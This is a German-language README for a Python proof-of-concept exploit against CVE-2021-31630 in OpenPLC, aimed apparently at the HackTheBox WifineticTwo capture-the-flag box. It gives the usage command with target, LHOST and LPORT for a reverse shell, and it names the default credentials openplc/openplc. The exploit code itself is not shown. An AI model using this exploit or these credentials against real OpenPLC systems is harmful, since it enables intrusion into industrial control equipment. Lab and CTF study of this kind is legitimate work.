
Ein einfaches Python-Skript zur Ausnutzung von CVE-2021-31630 auf dem HTB WifineticTwo CTF.
Dieses Python-Skript ist ein Proof-of-Concept-Exploit (PoC) für CVE-2021-31630, der eine Schwachstelle in OpenPLC auf der WifineticTwo-Box bei HackTheBox angreift. Es dient ausschließlich Bildungszwecken und zielt darauf ab, den Exploit-Prozess in einer kontrollierten Umgebung zu demonstrieren.
Dieses Tool ist ausschließlich für Sicherheitsforschung und Bildungszwecke bestimmt. Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Der Entwickler übernimmt keine Verantwortung für Schäden oder strafrechtliche Anklagen gegen Benutzer, die diesen Exploit missbrauchen.
Bevor Sie diesen Exploit ausführen, stellen Sie sicher, dass Folgendes vorhanden ist:
requests-Bibliothek ist installiert. Sie können sie mit pip install requests installieren.Um diesen Exploit zu verwenden, müssen Sie die URL des Ziels, die lokale Host-IP (LHOST) und den lokalen Port (LPORT) angeben, zu dem die Reverse Shell zurückverbinden soll. Optional können Sie den Benutzernamen und das Passwort für OpenPLC angeben, falls diese von den Standardwerten abweichen.
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
--target - Basisadresse des Ziels. Beispiel: http://wifinetictwo.htb:8080--lhost - Lokale Host-IP-Adresse, zu der die Reverse Shell zurückverbinden soll.--lport - Lokaler Port, zu dem die Reverse Shell zurückverbinden soll.--usr - (Optional) Benutzername für OpenPLC. Standard ist openplc.--pwd - (Optional) Passwort für OpenPLC. Standard ist openplc.